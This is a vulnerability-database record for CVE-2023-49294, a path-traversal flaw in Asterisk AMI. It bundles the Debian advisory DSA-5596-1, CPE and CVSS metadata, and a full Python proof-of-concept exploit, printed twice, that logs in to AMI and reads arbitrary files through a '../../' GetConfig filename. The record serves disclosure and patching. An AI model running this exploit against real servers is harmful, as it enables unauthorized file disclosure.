Search criteria
349 vulnerabilities found for asterisk by digium
VAR-202312-2340
Vulnerability from variot - Updated: 2024-03-30 22:40Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the live_dangerously is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue. Digium of Asterisk Path traversal vulnerabilities exist in products from multiple vendors.Information may be obtained. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Debian Security Advisory DSA-5596-1 security@debian.org https://www.debian.org/security/ Markus Koschany January 04, 2024 https://www.debian.org/security/faq
Package : asterisk CVE ID : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786 Debian Bug : 1059303 1059032 1059033
Multiple security vulnerabilities have been discovered in Asterisk, an Open Source Private Branch Exchange.
CVE-2023-37457
The 'update' functionality of the PJSIP_HEADER dialplan function can exceed
the available buffer space for storing the new value of a header. By doing
so this can overwrite memory or cause a crash. This is not externally
exploitable, unless dialplan is explicitly written to update a header based
on data from an outside source. If the 'update' functionality is not used
the vulnerability does not occur.
CVE-2023-38703
PJSIP is a free and open source multimedia communication library written in
C with high level API in C, C++, Java, C#, and Python languages. SRTP is a
higher level media transport which is stacked upon a lower level media
transport such as UDP and ICE. Currently a higher level transport is not
synchronized with its lower level transport that may introduce a
use-after-free issue. This vulnerability affects applications that have
SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media
transport other than UDP. This vulnerability’s impact may range from
unexpected application termination to control flow hijack/memory
corruption.
CVE-2023-49786
Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP.
For the oldstable distribution (bullseye), these problems have been fixed in version 1:16.28.0~dfsg-0+deb11u4.
We recommend that you upgrade your asterisk packages.
For the detailed security status of asterisk please refer to its security tracker page at: https://security-tracker.debian.org/tracker/asterisk
Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----
iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7 UeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F Jtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl AZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b zejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk T5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb bhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu mN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh bRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ Qvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+ sxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU +k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A -----END PGP SIGNATURE----- . # Exploit Title: Asterisk AMI - Partial File Content & Path Disclosure (Authenticated)
Date: 2023-03-26
Exploit Author: Sean Pesce
Vendor Homepage: https://asterisk.org/
Software Link: https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/
Version: 18.20.0
Tested on: Debian Linux
CVE: CVE-2023-49294
!/usr/bin/env python3
Proof of concept exploit for CVE-2023-49294, an authenticated vulnerability in Asterisk AMI that
facilitates filesystem enumeration (discovery of existing file paths) and limited disclosure of
file contents. Disclosed files must adhere to the Asterisk configuration format, which is similar
to the common INI configuration format.
References:
https://nvd.nist.gov/vuln/detail/CVE-2023-49294
https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f
https://docs.asterisk.org/Asterisk_18_Documentation/API_Documentation/AMI_Actions/GetConfig/
import argparse import getpass import socket import sys
CVE_ID = 'CVE-2023-49294'
DEFAULT_PORT = 5038 DEFAULT_FILE = '/etc/hosts' DEFAULT_ACTION_ID = 0 DEFAULT_TCP_READ_SZ = 1048576 # 1MB
def ami_msg(action, args, encoding='utf8'): assert type(action) == str, f'Invalid type for AMI Action (expected string): {type(action)}' assert type(args) == dict, f'Invalid type for AMI arguments (expected dict): {type(args)}' if 'ActionID' not in args: args['ActionID'] = 0 line_sep = '\r\n' data = f'Action: {action}{line_sep}' for a in args: data += f'{a}: {args[a]}{line_sep}' data += line_sep return data.encode(encoding)
def tcp_send_rcv(sock, data, read_sz=DEFAULT_TCP_READ_SZ): assert type(data) in (bytes, bytearray, memoryview), f'Invalid data type (expected bytes): {type(data)}' sock.sendall(data) resp = b'' while not resp.endswith(b'\r\n\r\n'): resp += sock.recv(read_sz) return resp
if name == 'main': # Parse command-line arguments argparser = argparse.ArgumentParser() argparser.add_argument('host', type=str, help='The host name or IP address of the Asterisk AMI server') argparser.add_argument('-p', '--port', type=int, help=f'Asterisk AMI TCP port (default: {DEFAULT_PORT})', default=DEFAULT_PORT) argparser.add_argument('-u', '--user', type=str, help=f'Asterisk AMI user', required=True) argparser.add_argument('-P', '--password', type=str, help=f'Asterisk AMI secret', default=None) argparser.add_argument('-f', '--file', type=str, help=f'File to read (default: {DEFAULT_FILE})', default=DEFAULT_FILE) argparser.add_argument('-a', '--action-id', type=int, help=f'Action ID (default: {DEFAULT_ACTION_ID})', default=DEFAULT_ACTION_ID) if '-h' in sys.argv or '--help' in sys.argv: print(f'Proof of concept exploit for {CVE_ID} in Asterisk AMI. More information here: \nhttps://nvd.nist.gov/vuln/detail/{CVE_ID}\n', file=sys.stderr) argparser.print_help() sys.exit(0) args = argparser.parse_args()
# Validate command-line arguments
assert 1 <= args.port <= 65535, f'Invalid port number: {args.port}'
args.host = socket.gethostbyname(args.host)
if args.password is None:
args.password = getpass.getpass(f'[PROMPT] Enter the AMI password for {args.user}: ')
print(f'[INFO] Proof of concept exploit for {CVE_ID}', file=sys.stderr)
print(f'[INFO] Connecting to Asterisk AMI: {args.user}@{args.host}:{args.port}', file=sys.stderr)
# Connect to the Asterisk AMI server
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.connect((args.host, args.port))
# Read server banner
banner = sock.recv(DEFAULT_TCP_READ_SZ)
print(f'[INFO] Connected to {banner.decode("utf8").strip()}', file=sys.stderr)
# Authenticate to the Asterisk AMI server
login_msg = ami_msg('Login', {'Username':args.user,'Secret':args.password})
login_resp = tcp_send_rcv(sock, login_msg)
while b'Authentication' not in login_resp:
login_resp = tcp_send_rcv(sock, b'')
if b'Authentication accepted' not in login_resp:
print(f'\n[ERROR] Invalid credentials: \n{login_resp.decode("utf8")}', file=sys.stderr)
sys.exit(1)
#print(f'[INFO] Authenticated: {login_resp.decode("utf8")}', file=sys.stderr)
print(f'[INFO] Login success', file=sys.stderr)
# Obtain file data via path traversal
traversal = '../../../../../../../../'
cfg_msg = ami_msg('GetConfig', {
'ActionID': args.action_id,
'Filename': f'{traversal}{args.file}',
#'Category': 'default',
#'Filter': 'name_regex=value_regex,',
})
resp = tcp_send_rcv(sock, cfg_msg)
while b'Response' not in resp:
resp = tcp_send_rcv(sock, b'')
print(f'', file=sys.stderr)
print(f'{resp.decode("utf8")}')
if b'Error' in resp:
sys.exit(1)
pass # Done
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202312-2340",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "asterisk",
"scope": "lt",
"trust": 1.0,
"vendor": "digium",
"version": "18.20.1"
},
{
"model": "asterisk",
"scope": "gte",
"trust": 1.0,
"vendor": "digium",
"version": "19.0.0"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "sangoma",
"version": "18.9"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "sangoma",
"version": "16.8.0"
},
{
"model": "asterisk",
"scope": "lt",
"trust": 1.0,
"vendor": "digium",
"version": "20.5.1"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "digium",
"version": "21.0.0"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "sangoma",
"version": "13.13.0"
},
{
"model": "asterisk",
"scope": null,
"trust": 0.8,
"vendor": "digium",
"version": null
},
{
"model": "certified asterisk",
"scope": null,
"trust": 0.8,
"vendor": "sangoma",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020239"
},
{
"db": "NVD",
"id": "CVE-2023-49294"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert5:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert10:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert11:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert12:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert5:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert6:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert7:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert8:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert9:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:21.0.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "18.20.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "20.5.1",
"versionStartIncluding": "19.0.0",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-49294"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Debian",
"sources": [
{
"db": "PACKETSTORM",
"id": "176383"
}
],
"trust": 0.1
},
"cve": "CVE-2023-49294",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "security-advisories@github.com",
"availabilityImpact": "NONE",
"baseScore": 4.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2023-49294",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2023-49294",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2023-49294",
"trust": 1.0,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020239"
},
{
"db": "NVD",
"id": "CVE-2023-49294"
},
{
"db": "NVD",
"id": "CVE-2023-49294"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue. Digium of Asterisk Path traversal vulnerabilities exist in products from multiple vendors.Information may be obtained. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-5596-1 security@debian.org\nhttps://www.debian.org/security/ Markus Koschany\nJanuary 04, 2024 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : asterisk\nCVE ID : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786\nDebian Bug : 1059303 1059032 1059033\n\nMultiple security vulnerabilities have been discovered in Asterisk, an Open\nSource Private Branch Exchange. \n\nCVE-2023-37457\n\n The \u0027update\u0027 functionality of the PJSIP_HEADER dialplan function can exceed\n the available buffer space for storing the new value of a header. By doing\n so this can overwrite memory or cause a crash. This is not externally\n exploitable, unless dialplan is explicitly written to update a header based\n on data from an outside source. If the \u0027update\u0027 functionality is not used\n the vulnerability does not occur. \n\nCVE-2023-38703\n\n PJSIP is a free and open source multimedia communication library written in\n C with high level API in C, C++, Java, C#, and Python languages. SRTP is a\n higher level media transport which is stacked upon a lower level media\n transport such as UDP and ICE. Currently a higher level transport is not\n synchronized with its lower level transport that may introduce a\n use-after-free issue. This vulnerability affects applications that have\n SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media\n transport other than UDP. This vulnerability\u2019s impact may range from\n unexpected application termination to control flow hijack/memory\n corruption. \n\nCVE-2023-49786\n\n Asterisk is susceptible to a DoS due to a race condition in the hello\n handshake phase of the DTLS protocol when handling DTLS-SRTP for media\n setup. This attack can be done continuously, thus denying new DTLS-SRTP\n encrypted calls during the attack. Abuse of this vulnerability may lead to\n a massive Denial of Service on vulnerable Asterisk servers for calls that\n rely on DTLS-SRTP. \n\n\nFor the oldstable distribution (bullseye), these problems have been fixed\nin version 1:16.28.0~dfsg-0+deb11u4. \n\nWe recommend that you upgrade your asterisk packages. \n\nFor the detailed security status of asterisk please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/asterisk\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD\nRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7\nUeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F\nJtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl\nAZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b\nzejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk\nT5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb\nbhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu\nmN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh\nbRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ\nQvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+\nsxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU\n+k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A\n-----END PGP SIGNATURE-----\n. # Exploit Title: Asterisk AMI - Partial File Content \u0026 Path Disclosure (Authenticated)\n# Date: 2023-03-26\n# Exploit Author: Sean Pesce\n# Vendor Homepage: https://asterisk.org/\n# Software Link: https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/\n# Version: 18.20.0\n# Tested on: Debian Linux\n# CVE: CVE-2023-49294\n\n#!/usr/bin/env python3\n#\n# Proof of concept exploit for CVE-2023-49294, an authenticated vulnerability in Asterisk AMI that\n# facilitates filesystem enumeration (discovery of existing file paths) and limited disclosure of\n# file contents. Disclosed files must adhere to the Asterisk configuration format, which is similar\n# to the common INI configuration format. \n#\n# References:\n# https://nvd.nist.gov/vuln/detail/CVE-2023-49294\n# https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f\n# https://docs.asterisk.org/Asterisk_18_Documentation/API_Documentation/AMI_Actions/GetConfig/\n\n\nimport argparse\nimport getpass\nimport socket\nimport sys\n\n\nCVE_ID = \u0027CVE-2023-49294\u0027\n\nDEFAULT_PORT = 5038\nDEFAULT_FILE = \u0027/etc/hosts\u0027\nDEFAULT_ACTION_ID = 0\nDEFAULT_TCP_READ_SZ = 1048576 # 1MB\n\n\n\ndef ami_msg(action, args, encoding=\u0027utf8\u0027):\n assert type(action) == str, f\u0027Invalid type for AMI Action (expected string): {type(action)}\u0027\n assert type(args) == dict, f\u0027Invalid type for AMI arguments (expected dict): {type(args)}\u0027\n if \u0027ActionID\u0027 not in args:\n args[\u0027ActionID\u0027] = 0\n line_sep = \u0027\\r\\n\u0027\n data = f\u0027Action: {action}{line_sep}\u0027\n for a in args:\n data += f\u0027{a}: {args[a]}{line_sep}\u0027\n data += line_sep\n return data.encode(encoding)\n\n\n\ndef tcp_send_rcv(sock, data, read_sz=DEFAULT_TCP_READ_SZ):\n assert type(data) in (bytes, bytearray, memoryview), f\u0027Invalid data type (expected bytes): {type(data)}\u0027\n sock.sendall(data)\n resp = b\u0027\u0027\n while not resp.endswith(b\u0027\\r\\n\\r\\n\u0027):\n resp += sock.recv(read_sz)\n return resp\n\n\n\nif __name__ == \u0027__main__\u0027:\n # Parse command-line arguments\n argparser = argparse.ArgumentParser()\n argparser.add_argument(\u0027host\u0027, type=str, help=\u0027The host name or IP address of the Asterisk AMI server\u0027)\n argparser.add_argument(\u0027-p\u0027, \u0027--port\u0027, type=int, help=f\u0027Asterisk AMI TCP port (default: {DEFAULT_PORT})\u0027, default=DEFAULT_PORT)\n argparser.add_argument(\u0027-u\u0027, \u0027--user\u0027, type=str, help=f\u0027Asterisk AMI user\u0027, required=True)\n argparser.add_argument(\u0027-P\u0027, \u0027--password\u0027, type=str, help=f\u0027Asterisk AMI secret\u0027, default=None)\n argparser.add_argument(\u0027-f\u0027, \u0027--file\u0027, type=str, help=f\u0027File to read (default: {DEFAULT_FILE})\u0027, default=DEFAULT_FILE)\n argparser.add_argument(\u0027-a\u0027, \u0027--action-id\u0027, type=int, help=f\u0027Action ID (default: {DEFAULT_ACTION_ID})\u0027, default=DEFAULT_ACTION_ID)\n if \u0027-h\u0027 in sys.argv or \u0027--help\u0027 in sys.argv:\n print(f\u0027Proof of concept exploit for {CVE_ID} in Asterisk AMI. More information here: \\nhttps://nvd.nist.gov/vuln/detail/{CVE_ID}\\n\u0027, file=sys.stderr)\n argparser.print_help()\n sys.exit(0)\n args = argparser.parse_args()\n\n # Validate command-line arguments\n assert 1 \u003c= args.port \u003c= 65535, f\u0027Invalid port number: {args.port}\u0027\n args.host = socket.gethostbyname(args.host)\n if args.password is None:\n args.password = getpass.getpass(f\u0027[PROMPT] Enter the AMI password for {args.user}: \u0027)\n\n print(f\u0027[INFO] Proof of concept exploit for {CVE_ID}\u0027, file=sys.stderr)\n print(f\u0027[INFO] Connecting to Asterisk AMI: {args.user}@{args.host}:{args.port}\u0027, file=sys.stderr)\n\n # Connect to the Asterisk AMI server\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.connect((args.host, args.port))\n\n # Read server banner\n banner = sock.recv(DEFAULT_TCP_READ_SZ)\n print(f\u0027[INFO] Connected to {banner.decode(\"utf8\").strip()}\u0027, file=sys.stderr)\n\n # Authenticate to the Asterisk AMI server\n login_msg = ami_msg(\u0027Login\u0027, {\u0027Username\u0027:args.user,\u0027Secret\u0027:args.password})\n login_resp = tcp_send_rcv(sock, login_msg)\n while b\u0027Authentication\u0027 not in login_resp:\n login_resp = tcp_send_rcv(sock, b\u0027\u0027)\n if b\u0027Authentication accepted\u0027 not in login_resp:\n print(f\u0027\\n[ERROR] Invalid credentials: \\n{login_resp.decode(\"utf8\")}\u0027, file=sys.stderr)\n sys.exit(1)\n #print(f\u0027[INFO] Authenticated: {login_resp.decode(\"utf8\")}\u0027, file=sys.stderr)\n print(f\u0027[INFO] Login success\u0027, file=sys.stderr)\n\n # Obtain file data via path traversal\n traversal = \u0027../../../../../../../../\u0027\n cfg_msg = ami_msg(\u0027GetConfig\u0027, {\n \u0027ActionID\u0027: args.action_id,\n \u0027Filename\u0027: f\u0027{traversal}{args.file}\u0027,\n #\u0027Category\u0027: \u0027default\u0027,\n #\u0027Filter\u0027: \u0027name_regex=value_regex,\u0027,\n })\n resp = tcp_send_rcv(sock, cfg_msg)\n while b\u0027Response\u0027 not in resp:\n resp = tcp_send_rcv(sock, b\u0027\u0027)\n\n print(f\u0027\u0027, file=sys.stderr)\n print(f\u0027{resp.decode(\"utf8\")}\u0027)\n\n if b\u0027Error\u0027 in resp:\n sys.exit(1)\n\n pass # Done\n \n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-49294"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-020239"
},
{
"db": "PACKETSTORM",
"id": "176383"
},
{
"db": "PACKETSTORM",
"id": "177819"
}
